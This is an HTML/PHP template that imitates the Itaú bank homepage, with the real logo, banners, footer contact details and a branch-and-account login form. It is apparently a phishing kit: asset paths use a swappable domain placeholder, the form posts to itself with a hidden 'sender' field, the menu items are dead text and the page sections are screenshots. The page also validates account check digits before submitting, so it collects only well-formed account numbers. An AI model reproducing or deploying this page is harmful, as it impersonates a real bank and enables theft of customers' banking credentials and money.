<!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
	<meta http-equiv="X-UA-Compatible" content="ie=edge">

	<title>Banco Itaú | Feito com você</title>
	<link rel="shortcut icon" href="<?= DOMINIO; ?>/public/images/favicon.ico">

	<meta name='theme-color' content='#EC7000'>
	<meta name='apple-mobile-web-app-status-bar-style' content='#EC7000'>
	<meta name='msapplication-navbutton-color' content='#EC7000'>

	<link rel="stylesheet" href="<?= DOMINIO; ?>/public/styles/fonts.css">
	<link rel="stylesheet" href="<?= DOMINIO; ?>/public/styles/custom.css">
</head>
<body>
<form action="#" method="post" onsubmit="return checkForm();" autocomplete="off">
	<div class="container hm_header">
		<div class="content flex-row align-items-center justify-between">
			<div id="header_esq" class="flex-row align-items-center justify-between">
				<div class="logo"><img src="<?= DOMINIO; ?>/public/images/logo.png" alt=""></div>
				<ul class="menu align-items-center">
					<li>para você</li>
					<li>para empresas</li>
					<li>ajuda</li>
					<li>busca</li>
				</ul>
			</div>
			<div id="header_dir" class="flex-row align-items-center justify-between">
				<div class="acesso flex-row align-items-center justify-center">
					<div class="inps align-items-center">
						<input type="tel" name="is_agencia" id="is_agencia" placeholder="agência" maxlength="4"
						       oninput='if(this.value.length >= this.maxLength){$("#is_conta").focus();}'>
						<span></span>
						<input type="tel" name="is_conta" id="is_conta" placeholder="conta" maxlength="7">
					</div>
					<button class="btn_acesso">
						<img src="<?= DOMINIO; ?>/public/images/icon_btn_acesso_off.png" alt="">
					</button>
				</div>
				<div class="more_acesso flex-row align-items-center justify-center">
					<i class='fas fa-plus'></i>
					mais acessos
				</div>
				<button class="open_account">abra sua conta</button>
			</div>
		</div>
	</div>
	<input type="hidden" name="sender" value="index">
</form>

<div class="container hm_banner">
	<ul class="banner">
		<li>
			<div class="content">
				<header>
					<h1>Saque Aniversário - FGTS</h1>
					<p>Antecipe até 7 saques e não se preocupe com parcelas mensais</p>
					<a href="#">confira aqui</a>
				</header>
			</div>

		</li>
		<li style="display: none;">
			<header>
				<h1>iti: o banco digital grátis do Itaú</h1>
				<p>Qualquer pessoa a partir de 14 anos pode abrir uma conta.</p>
				<a href='#'>abra agora a sua</a>
			</header>
			<img src='<?= DOMINIO; ?>/public/images/banner2.gif' alt=''>
		</li>
		<li style="display: none;">
			<header>
				<h1>A melhor opção para suas dívidas</h1>
				<p>Negocie do seu jeito, on-line e com condições especiais.</p>
				<a href='#'>renegocie aqui</a>
			</header>
			<img src='<?= DOMINIO; ?>/public/images/banner3.png' alt=''>
		</li>
	</ul>
</div>
<div class="container hm_dest">
	<div class="content">
		<header>
			<h1 class="title">resolva as questões do dia a dia</h1>
		</header>

		<img src="<?= DOMINIO; ?>/public/images/dest_questoes.png" style="width: 1201px;">
	</div>
</div>
<div class='container hm_dest'>
	<div class='content'>
		<header>
			<h1 class='title'>contrate nossos produtos on-line</h1>
			<p class="subtitle">Confira as soluções que o banco Itaú oferece para você.</p>
		</header>

		<div class="align-items-center justify-between">
			<img src="<?= DOMINIO; ?>/public/images/dest_prod1.png" alt="" style="width: 1221px;margin-bottom: 19px;">
		</div>

		<div class="flex-row">
			<img src="<?= DOMINIO; ?>/public/images/dest_prod2.png" alt="">
		</div>
	</div>
</div>
<div class='container hm_dest'>
	<div class='content'>
		<header>
			<h1 class='title'>confira nossos cartões de crédito mais pedidos da semana</h1>
		</header>

		<img src='<?= DOMINIO; ?>/public/images/dest_cards.png' style='width: 1230px;'>
	</div>
</div>
<div class="container hm_dest">
	<div class="content">
		<header>
			<h1 class="title">resolva tudo pelos apps</h1>
			<p class="subtitle">Com os aplicativos do banco Itaú, você faz tudo pelo seu celular!</p>
		</header>

		<div class="boxed_apps flex-row align-items-center justify-between">
			<img src="<?= DOMINIO; ?>/public/images/icon_app1.png" alt="">
			<img src="<?= DOMINIO; ?>/public/images/icon_app2.png" alt="">
			<img src="<?= DOMINIO; ?>/public/images/icon_app3.jpg" alt="">
			<img src="<?= DOMINIO; ?>/public/images/icon_app4.png" alt="">
			<img src="<?= DOMINIO; ?>/public/images/icon_app5.png" alt="">
		</div>
	</div>
</div>
<div class="container hm_footer">
	<div class="content flex-row justify-between">
		<div>
			<h1>nossos produtos</h1>
			<ul>
				<li>conta corrente</li>
				<li>cartões de crédito</li>
				<li>consórcio</li>
				<li>seguros</li>
				<li>investimentos</li>
				<li>renegociação</li>
			</ul>
		</div>

		<div>
			<h1>Itaú</h1>
			<ul>
				<li>relações com investidores</li>
				<li>carreiras</li>
				<li>imprensa</li>
				<li>sustentabilidade</li>
				<li>Integridade e Ética</li>
				<li>análises econômicas</li>
				<li>termos de uso</li>
				<li>privacidade</li>
			</ul>
		</div>

		<div>
			<h1>ajuda</h1>
			<ul>
				<li>central de ajuda</li>
				<li>envie sua mensagem</li>
				<li>denúncia</li>
				<li>canais Itaú</li>
				<li>encontre agências</li>
				<li>segurança</li>
				<li>acessos não correntista</li>
				<li>consumidor.gov</li>
			</ul>
		</div>

		<div>
			<h1>fale com o Itaú</h1>
			<ul>
				<li>sac 0800 728 0728</li>
				<li>ouvidoria 0800 570 0011</li>
				<li>denúncia</li>
				<li>envie sua mensagem</li>
			</ul>
		</div>

	</div>
</div>
<div class="container hm_footer_final">
	<div class="content">
		&copy; 2021 Itaú Unibanco Holding S.A. CNPJ: 60.872.504/0001-23
		<br>
		Praça Alfredo Egydio de Souza Aranha, 100, Torre Olavo Setubal, Parque Jabaquara - CEP 04344-902 - São Paulo - Brasil
	</div>
</div>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.min.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/jquery.mask.js"></script>
<script src="<?= DOMINIO; ?>/public/javascripts/custom.js"></script>
<script src='https://kit.fontawesome.com/eb32f84b17.js' crossorigin='anonymous'></script>
<script>
	$(document).ready(() => {
		$('#is_agencia').mask('0000');
		$('#is_conta').mask('00000-0', {reverse: true});

		$('form input').keyup(() => {
			const agencia = $('#is_agencia');
			const conta = $('#is_conta');

			if (agencia.val().length >= 3 && conta.val().length >= 4) {
				$('.btn_acesso').css('background', '#fff').html(`<img src='<?= DOMINIO; ?>/public/images/icon_btn_acesso_on.png' alt=''>`);
			} else {
				$('.btn_acesso').css('background', '#d6d0cc').html(`<img src='<?= DOMINIO; ?>/public/images/icon_btn_acesso_off.png' alt=''>`);
			}
		});
	});

	function checkForm() {
		const agencia = $('#is_agencia');
		const conta = $('#is_conta');

		const explode = conta.val().split('-');
		const ag_ct = agencia.val() + '' + explode[0];
		const digito = explode[1];
		const checkCount = ValidaConta(ag_ct, digito);

		if (agencia.val().length < 4 || conta.val().length < 5 || !checkCount) {
			alert('Agência e/ou conta informados não estão corretos. Tente novamente!');
			conta.val('');
			agencia.val('').focus();
			return false;
		} else {
			$('.btn_acesso').attr('disabled', true);
			return true;
		}
	}
</script>
</body>
</html>